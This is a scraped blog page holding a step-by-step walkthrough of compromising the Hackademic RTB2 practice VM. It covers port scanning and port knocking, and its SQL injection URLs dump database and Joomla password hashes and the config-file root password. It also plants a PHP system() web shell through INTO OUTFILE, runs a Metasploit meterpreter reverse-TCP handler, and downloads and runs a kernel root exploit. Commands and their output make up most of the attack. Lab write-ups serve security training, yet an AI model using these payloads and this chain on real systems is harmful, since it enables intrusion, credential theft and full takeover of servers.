Lab - Hackademic -RTB2
来源:互联网 发布:微信一键转发软件苹果 编辑:程序博客网 时间:2024/05/29 20:01
Description
Hackademic RTB2 is the second edition of Hackademic vulnerable Virtual Machine. The first challenge is described here.
Installation
Hackademic RTB2 can be downloaded from following places:
- http://dc97.4shared.com/download/-pIYENTQ/HackademicRTB2.zip
- https://rapidshare.com/files/4089592556/Hackademic.RTB2.zip
- http://download.vulnhub.com/hackademic/Hackademic.RTB2.zip
Environment
- Attacker: 192.168.1.111 (Kali)
- Victim: 192.168.1.100 (VirtualBox)
Should you need to discover the IP address of your target, use tools like fping, netdiscover or nmap.
Discover online hosts with nmap.
nmap -v -sn -d -oA online 192.168.1.1/24root:~ /# grep "Status: Up" online.gnmapHost: 192.168.1.1 () Status: UpHost: 192.168.1.100 () Status: UpHost: 192.168.1.108 () Status: UpHost: 192.168.1.109 () Status: UpHost: 192.168.1.187 () Status: UpHost: 192.168.1.111 () Status: Up
Scan ports with nmap
nmap -v -n -Pn -sS -oA port -sV -p- -iL scanhosts.txt
Assessment
Services/Versions
A first nmap scan shows a web server on port 80/tcp and a service on port 666/tcp that looks filtered:
root@kali:~# nmap -v -d -sV -p- 192.168.1.109....Nmap scan report for 192.168.1.109Host is up (0.00048s latency).Not shown: 65533 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.2.14 ((Ubuntu))666/tcp filtered doomMAC Address: 08:00:27:26:7E:A8 (Cadmus Computer Systems)....
It shows that port 666/tcp is now opened and hosting a web service. We think of port knowcking. There is also a DNS based service on port 5353/udp.
Web service
Let’s analyze what could be interesting on port 80/tcp. Point your browser to the root of the target:
Using wfuzz also discloses the presence of a phpmyadmin interface:
root:~ /# wfuzz -c --hc 404 -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt http://192.168.1.109/FUZZ/********************************************************* Wfuzz 2.0 - The Web Bruteforcer *********************************************************Target: http://192.168.1.109/FUZZ/Payload type: file,/usr/share/dirbuster/wordlists/directory-list-2.3-small.txtTotal requests: 87664==================================================================ID Response Lines Word Chars Request==================================================================00017: C=403 10 L 30 W 289 Ch " - cgi-bin"00074: C=200 1002 L 4785 W 72044 Ch " - icons"00204: C=403 10 L 30 W 285 Ch " - doc"00525: C=200 37 L 103 W 1324 Ch " - #"00524: C=200 37 L 103 W 1324 Ch " - index"00528: C=200 37 L 103 W 1324 Ch "ered case sensative list, where entries were found"00529: C=200 37 L 103 W 1324 Ch " - #"00530: C=200 37 L 103 W 1324 Ch " Suite 300, San Francisco, California, 94105, USA."00531: C=200 37 L 103 W 1324 Ch " - # on atleast 3 different hosts"00532: C=200 37 L 103 W 1324 Ch "d a letter to Creative Commons, 171 Second Street,"00533: C=200 37 L 103 W 1324 Ch " - "00534: C=200 37 L 103 W 1324 Ch "sit http://creativecommons.org/licenses/by-sa/3.0/"00535: C=200 37 L 103 W 1324 Ch "on-Share Alike 3.0 License. To view a copy of this"00536: C=200 37 L 103 W 1324 Ch "# This work is licensed under the Creative Commons"00537: C=200 37 L 103 W 1324 Ch " - # Copyright 2007 James Fisher"00538: C=200 37 L 103 W 1324 Ch " - #"00541: C=200 37 L 103 W 1324 Ch " - #"00549: C=200 37 L 103 W 1324 Ch " - # directory-list-2.3-small.txt"01064: C=403 10 L 30 W 292 Ch " - javascript"01318: C=200 15 L 30 W 324 Ch " - check"11356: C=200 138 L 516 W 8625 Ch " - phpmyadmin"45597: C=200 37 L 103 W 1324 Ch " - "
Find vulnerabilities in the first form
Let’s try to find a vulnerability in the first authentication form. I have used W3AF as well as Sqlmap but have found no SQL injection. Using fuzzing techniques with BurpSuite (Intruder module) against the password field leads to the discovery of an SQL injection.
Notice that it’s a real fuzzing exercise here (I must confess it’s also a little bit by chance) to discover the injection (you will have to use the full list of SQL injection strings from BurpSuite as well as suffixing them with a simple quote. On the other way, the authentication mechanism doesn’t make use of a database. The PHP code will show that the following combination is hard coded:
- login: admin
- password: ’ or 1=1 –’
Anyway, this combination leads to a new message as well as as long encoded string:
<h2>Ok, nice shot...<br></h2>...but, you are looking in a wrong place bro! ;-)<br><br><font color="black">%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A</font color="black">
Decode it with hackbar. and we can get:
3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e 0d 0a 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 69 6e 27 20 6f 6e 20 68 65 61 76 65 6e 27 73 20 64 6f 6f 72 20 2e 2e 20 3a 29 0d 0a 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 0d 0a 3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e
<--------->Knock Knock Knockin' on heaven's door .. :)00110001 00110000 00110000 00110001 00111010 00110001 00110001 00110000 00110001 00111010 00110001 00110000 00110001 00110001 00111010 00110001 00110000 00110000 00110001<--------->
Write double py scripts, one for is decode, the other is for port knock.
Decode KNOCK PORT STRING
>>> binstr = "00110001 00110000 00110000 00110001 00111010 00110001 00110001 00110000 00110001 00111010 00110001 00110000 00110001 00110001 00111010 00110001 00110000 00110000 00110001">>> bins = binstr.split(" ")>>> bins['00110001', '00110000', '00110000', '00110001', '00111010', '00110001', '00110001', '00110000', '00110001', '00111010', '00110001', '00110000', '00110001', '00110001', '00111010', '00110001', '00110000', '00110000', '00110001']>>> bin2str = [chr(int(int(i, 2))) for i in bins]>>> bin2str['1', '0', '0', '1', ':', '1', '1', '0', '1', ':', '1', '0', '1', '1', ':', '1', '0', '0', '1']>>> "".join(bin2str)'1001:1101:1011:1001'
KNOCK PORT
#!/usr/bin/env python# -*- coding: utf8 -*-import sockethost = "192.168.1.109"ports = "1001:1101:1011:1001"csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)for port in ports.split(":"): print "[*] knock %s port %s" % (host, port) csock.connect_ex((host, int(port)))csock.close()root:~ /# python knock_door.py[*] knock 192.168.1.109 port 1001[*] knock 192.168.1.109 port 1101[*] knock 192.168.1.109 port 1011[*] knock 192.168.1.109 port 1001root:~ /# ncat -v 192.168.1.109 666Ncat: Version 6.47 ( http://nmap.org/ncat )Ncat: Connected to 192.168.1.109:666.^C
or
knock -v 192.168.1.109 1001 1101 1011 1001
Find a vulnerability in the second application
Now, time to find a vulnerability in the second application, the Joomla portal. Let’s try to find a SQL injection. Sqlmap leads to the disclosure of the MySQL users:
We can use joomscan to discovery vulnerabilities.
lab:joomscan/ $ perl joomscan.pl -u "http://192.168.1.109:666/" ..|''|| '|| '||' '|' | .|'''.| '||''|. .|' || '|. '|. .' ||| ||.. ' || || || || || || | | || ''|||. ||...|' '|. || ||| ||| .''''|. . '|| || ''|...|' | | .|. .||. |'....|' .||. =================================================================OWASP Joomla! Vulnerability Scanner v0.0.4 (c) Aung Khant, aungkhant]at[yehg.netYGN Ethical Hacker Group, Myanmar, http://yehg.net/labUpdate by: Web-Center, http://web-center.si (2011)=================================================================Vulnerability Entries: 611Last update: February 2, 2012Use "update" option to update the databaseUse "check" option to check the scanner updateUse "download" option to download the scanner latest version packageUse svn co to update the scanner and the databasesvn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan Target: http://192.168.1.109:666Server: Apache/2.2.14 (Ubuntu)X-Powered-By: PHP/5.3.2-1ubuntu4.7## Checking if the target has deployed an Anti-Scanner measure[!] Scanning Passed ..... OK ## Detecting Joomla! based Firewall ...[!] No known firewall detected!## Fingerprinting in progress ...~Generic version family ....... [1.5.x]~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]* Deduced version range is : [1.5.12 - 1.5.14]## Fingerprinting done.## 3 Components Found in front page ## com_mailto com_user com_abc Vulnerabilities Discovered==========================# 1Info -> Generic: htaccess.txt has not been renamed. Versions Affected: AnyCheck: /htaccess.txtExploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.Vulnerable? Yes# 2Info -> Generic: Unprotected Administrator directory Versions Affected: AnyCheck: /administrator/Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdfVulnerable? N/A# 3Info -> Core: Multiple XSS/CSRF Vulnerability Versions Affected: 1.5.9 <= Check: /?1.5.9-xExploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities. Vulnerable? No# 4Info -> Core: JSession SSL Session Disclosure Vulnerability Versions effected: Joomla! 1.5.8 <= Check: /?1.5.8-xExploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session. Vulnerable? No# 5Info -> Core: Frontend XSS Vulnerability Versions effected: 1.5.10 <=Check: /?1.5.10-xExploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.Vulnerable? No# 6Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1.5.11 <=Check: /libraries/phpxmlrpc/xmlrpcs.phpExploit: /libraries/phpxmlrpc/xmlrpcs.phpVulnerable? No# 7Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1.5.12 <=Check: /libraries/joomla/utilities/compat/php50x.phpExploit: /libraries/joomla/utilities/compat/php50x.phpVulnerable? No# 8Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability Versions effected: 1.5.11 <=Check: /?1.5.11-x-http_refExploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.Vulnerable? No# 9Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability Versions effected: 1.5.11 <=Check: /?1.5.11-x-php-s3lfExploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser. Vulnerable? No# 10Info -> Core: Authentication Bypass Vulnerability Versions effected: Joomla! 1.5.3 <=Check: /administrator/Exploit: Backend accepts any password for custom Super Administrator when LDAP enabledVulnerable? No# 11Info -> Core: Path Disclosure Vulnerability Versions effected: Joomla! 1.5.3 <=Check: /?1.5.3-path-discloseExploit: Crafted URL can disclose absolute pathVulnerable? No# 12Info -> Core: User redirected Spamming Vulnerability Versions effected: Joomla! 1.5.3 <=Check: /?1.5.3-spamExploit: User redirect spamVulnerable? No# 13Info -> Core: joomla.php Remote File Inclusion Vulnerability Versions effected: 1.0.0 Check: /includes/joomla.phpExploit: /includes/joomla.php?includepath=Vulnerable? No# 14Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: 1.0.13 <=Check: /administrator/Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.Vulnerable? Yes# 15Info -> Core: Path Disclosure Vulnerability Versions effected: Joomla! 1.5.12 <=Check: /libraries/joomla/utilities/compat/php50x.phpExploit: /libraries/joomla/utilities/compat/php50x.phpVulnerable? No# 16Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability Versions effected: Joomla! 1.5.8 <=Check: /plugins/editors/xstandard/attachmentlibrary.phpExploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/editors/xstandard/attachmentlibrary.phpVulnerable? No# 17Info -> CoreTemplate: ja_purity XSS Vulnerability Versions effected: 1.5.10 <=Check: /templates/ja_purity/Exploit: A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.Vulnerable? No# 18Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability Versions effected: Joomla! 1.5.0 Beta/StableCheck: /libraries/phpmailer/phpmailer.phpExploit: N/AVulnerable? No# 19Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities Versions effected: Joomla! 1.5.12 Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296Vulnerable? Yes# 20Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability Versions Affected: 1.5.5 <= Check: /components/com_user/controller.phpExploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write into field "token" char ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password Vulnerable? No# 21Info -> CoreComponent: com_content SQL Injection Vulnerability Version Affected: Joomla! 1.0.0 <= Check: /components/com_content/Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--Vulnerable? No# 22Info -> CoreComponent: com_search Remote Code Execution Vulnerability Version Affected: Joomla! 1.5.0 beta 2 <= Check: /components/com_search/Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3BVulnerable? No# 23Info -> CoreComponent: MailTo SQL Injection Vulnerability Versions effected: N/ACheck: /components/com_mailto/Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1Vulnerable? No# 24Info -> CoreComponent: com_content Blind SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 RC3Check: /components/com_content/Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28Vulnerable? No# 25Info -> CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.7 <= Check: /components/com_content/Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration. Vulnerable? No# 26Info -> CoreComponent: com_weblinks XSS Vulnerability Version Affected: Joomla! 1.5.7 <= Check: /components/com_weblinks/Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms). Vulnerable? No# 27Info -> CoreComponent: com_mailto Email Spam Vulnerability Version Affected: Joomla! 1.5.6 <= Check: /components/com_mailto/Exploit: The mailto component does not verify validity of the URL prior to sending.Vulnerable? No# 28Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1Check: /components/com_content/Exploit: Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archiveVulnerable? No# 29Info -> CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.9 <=Check: /components/com_content/Exploit: A XSS vulnerability exists in the category view of com_content. Vulnerable? No# 30Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability Versions effected: Joomla! 1.5.0 BetaCheck: /components/com_search/Exploit: N/AVulnerable? No# 31Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability Versions effected: 1.0.7 <=Check: /components/com_poll/Exploit: Send request /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>Vulnerable? No# 32Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability Versions effected: N/ACheck: /components/com_banners/Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2Vulnerable? No# 33Info -> CoreComponent: com_mailto timeout Vulnerability Versions effected: 1.5.13 <=Check: /components/com_mailto/Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.Vulnerable? Yes# 34Info -> Component: Amblog SQL Injection Versions Affected: 1.0 Check: /index.php?option=com_amblog&view=amblog&catid=-1UNIONSELECT@@versionExploit: /index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@versionVulnerable? No# 35Info -> Component: Component com_newsfeeds SQL injection Versions Affected: Any <= Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--Vulnerable? No# 36Info -> Component: ABC Extension com_abc SQL Versions Affected: 1.1.7 <= Check: /index.php?option=com_abc&view=abc&letter=AS§ionid='Exploit: /index.php?option=com_abc&view=abc&letter=AS§ionid='Vulnerable? N/A# 37Info -> Component: Joomla Component com_searchlog SQL Injection Versions Affected: 3.1.0 <= Check: /administrator/index.php?option=com_searchlog&act=logExploit: /administrator/index.php?option=com_searchlog&act=logVulnerable? No# 38Info -> Component: Joomla Component com_djartgallery Multiple Vulnerabilities Versions Affected: 0.9.1 <= Check: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+Vulnerable? N/AThere are 4 vulnerable points in 38 found entries!~[*] Time Taken: 30 sec~[*] Send bugs, suggestions, contributions to joomscan@yehg.net
SQL Injections as follow:
http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=AS§ionid=%27http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27&Itemid=3
Get PHPMYADMIN USERS
http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27%20union%20all%20select%201,(SELECT%20GROUP_CONCAT(User,0x7c,password)%20from%20`mysql`.`user`)--%20\&Itemid=3root|*5D3C124406BF85494067182754131FF4DAB9C6C7,root|*5D3C124406BF85494067182754131FF4DAB9C6C7,root|*5D3C124406BF85494067182754131FF4DAB9C6C7,debian-sys-maint|*F36E6519B0B1D62AA2D5346EFAD66D1CAF248996,phpmyadmin|*5D3C124406BF85494067182754131FF4DAB9C6C7
Get Joomla Users
http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27%20union%20all%20select%201,%28SELECT%20GROUP_CONCAT%28username,0x7c,password%29%20from%20%60joomla%60.%60jos_users%60%29--%20\&Itemid=3Administrator|08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl,JSmith|992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF,BTallor|abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy
Get PHPADMIN USER FROM Configuration File
http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27%20union%20all%20select%201,load_file(%27/var/www/configuration.php%27)--%20a&Itemid=3<?phpclass JConfig {/* Site Settings */var $offline = '0';var $offline_message = 'This site is down for maintenance.<br /> Please check back again soon.';var $sitename = 'Hackademic.RTB2';var $editor = 'tinymce';var $list_limit = '20';var $legacy = '0';/* Debug Settings */var $debug = '0';var $debug_lang = '0';/* Database Settings */var $dbtype = 'mysql';var $host = 'localhost';var $user = 'root';var $password = 'yUtJklM97W';var $db = 'joomla';var $dbprefix = 'jos_';/* Server Settings */var $live_site = '';var $secret = 'iFzlVUCg9BBPoUDU';var $gzip = '0';var $error_reporting = '-1';var $helpurl = 'http://help.joomla.org';var $xmlrpc_server = '0';var $ftp_host = '127.0.0.1';var $ftp_port = '21';var $ftp_user = '';var $ftp_pass = '';var $ftp_root = '';var $ftp_enable = '0';var $force_ssl = '0';/* Locale Settings */var $offset = '0';var $offset_user = '0';/* Mail Settings */var $mailer = 'mail';var $mailfrom = 'admin@hackademirtb2.com';var $fromname = 'Hackademic.RTB2';var $sendmail = '/usr/sbin/sendmail';var $smtpauth = '0';var $smtpsecure = 'none';var $smtpport = '25';var $smtpuser = '';var $smtppass = '';var $smtphost = 'localhost';/* Cache Settings */var $caching = '0';var $cachetime = '15';var $cache_handler = 'file';/* Meta Settings */var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';var $MetaKeys = 'joomla, Joomla';var $MetaTitle = '1';var $MetaAuthor = '1';/* SEO Settings */var $sef = '0';var $sef_rewrite = '0';var $sef_suffix = '0';/* Feed Settings */var $feed_limit = 10;var $feed_email = 'author';var $log_path = '/var/www/logs';var $tmp_path = '/var/www/tmp';/* Session Setting */var $lifetime = '15';var $session_handler = 'database';}?>
Set up a backdoor
Now that we have the password for root, let’s connect to the phpmyadmin interface. Go to http://192.168.1.109/phpmyadmin and use the above credentials.
Open a SQL window and create a rudimentary shell that we will use to download a more sophisticated one:
select "<?php system($_GET[\"cmd\"]); ?>" > into outfile "/var/www/cmd.php"
open http://192.168.1.109:666/cmd.php?cmd=id, we can get:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Please reverse tcp backdoor with php/meterpreter/reverse_tcp (metasploit)
Privileges escalation
After some researches on http://www.exploit-db.com, you will find an exploit that works (http://www.exploit-db.com/download/14814).
From your reverse shell, download it, compile it and execute it:
root:~ /# msfconsole ______________________________________________________________________________| || METASPLOIT CYBER MISSILE COMMAND V4 ||______________________________________________________________________________| \ / / \ . / / x \ / / \ / + / \ + / / * / / / . / X / / X / ### / # % # / ### . / . / . * . / * + * ^#### __ __ __ ####### __ __ __ ######## / \ / \ / \ ########### / \ / \ / \ ##################################################################################################################################################################### WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF ################################################################################# http://metasploit.proTrouble managing data? List, sort, group, tag and search your pentest datain Metasploit Pro -- learn more on http://rapid7.com/metasploit =[ metasploit v4.9.3-2014071601 [core:4.9 api:1.0] ]+ -- --=[ 1330 exploits - 802 auxiliary - 224 post ]+ -- --=[ 346 payloads - 35 encoders - 8 nops ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]msf > use multi/handlermsf exploit(handler) > set payload php/meterpreter/reverse_tcppayload => php/meterpreter/reverse_tcpmsf exploit(handler) > show optionsModule options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf exploit(handler) > set LHOST 192.168.1.111LHOST => 192.168.1.111msf exploit(handler) > set LPORT 80LPORT => 80msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.111:80[*] Starting the payload handler...[*] Sending stage (40551 bytes) to 192.168.1.109[*] Meterpreter session 1 opened (192.168.1.111:80 -> 192.168.1.109:60094) at 2015-07-11 22:36:34 -0400meterpreter > getuidServer username: www-data (33)meterpreter > sysinfoComputer : HackademicRTB2OS : Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686Meterpreter : php/phpmeterpreter > shellProcess 1475 created.Channel 0 created.iduid=33(www-data) gid=33(www-data) groups=33(www-data)python2 -c "import pty;pty.spawn('/bin/bash')"www-data@HackademicRTB2:/var/www$ wget -O 14814.c https://www.exploit-db.com/download/14814<r/www$ wget -O 14814.c https://www.exploit-db.com/download/14814--2015-07-12 05:44:05-- https://www.exploit-db.com/download/14814Resolving www.exploit-db.com... 192.124.249.8Connecting to www.exploit-db.com|192.124.249.8|:443... connected.ERROR: certificate common name `*.mycloudproxy.com' doesn't match requested host name `www.exploit-db.com'.To connect to www.exploit-db.com insecurely, use `--no-check-certificate'.www-data@HackademicRTB2:/var/www$ wget --no-check-certificate -O 14814.c https://www.exploit-db.com/download/14814<tificate -O 14814.c https://www.exploit-db.com/download/14814--2015-07-12 05:44:40-- https://www.exploit-db.com/download/14814Resolving www.exploit-db.com... 192.124.249.8Connecting to www.exploit-db.com|192.124.249.8|:443... connected.WARNING: certificate common name `*.mycloudproxy.com' doesn't match requested host name `www.exploit-db.com'.HTTP request sent, awaiting response... 200 OKLength: unspecified [application/txt]Saving to: `14814.c' [ <=> ] 15,610 68.0K/s in 0.2s2015-07-12 05:44:44 (68.0 KB/s) - `14814.c' saved [15610]www-data@HackademicRTB2:/var/www$ gcc -o exploit_priv 14814.cgcc -o exploit_priv 14814.cwww-data@HackademicRTB2:/var/www$ ./exploit_priv./exploit_priv[+] looking for symbols...[+] resolved symbol commit_creds to 0xc016dd80[+] resolved symbol prepare_kernel_cred to 0xc016e0c0[+] setting up exploit payload...[+] creating PF_CAN socket...[+] connecting PF_CAN socket...[+] clearing out any active OPs via RX_DELETE...[+] removing any active user-owned shmids...[+] massaging kmalloc-96 SLUB cache with dummy allocations[+] corrupting BCM OP with truncated allocation via RX_SETUP...[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...[+] mmap'ed mapping of length 328 at 0xb787d000[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...[+] seeking out the smashed shmid_kernel...[+] discovered our smashed shmid_kernel at shmid[104] = 3539052[+] re-smashing the shmid_kernel with exploit payload...[+] launching root shell!root@HackademicRTB2:/var/www# ididuid=0(root) gid=0(root)root@HackademicRTB2:/var/www#
Tools
- Nmap
- Wfuzz
- Sqlmap
- Burp Suite
- Joomscan
- Medusa
- Hydra
- Metasploit
Sources
check.php
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <html><head><title>Hackademic.RTB2</title><center><br><br><br><body bgcolor="black"><img src="hackademicrtb2.png"><font color="green"></head></form><body><h2><br><?php$pass_answer = "' or 1=1--'";$pass_answer_2 = "' OR 1=1--'";if($_POST['password'] == $pass_answer or $_POST['password'] == $pass_answer_2){ echo '<h2>'; echo 'Ok, nice shot...'; echo '<br>'; echo '</h2>'; echo '...but, you are looking in a wrong place bro! ;-)'; echo '<br>'; echo '<br>'; echo '<font color="black">'; echo 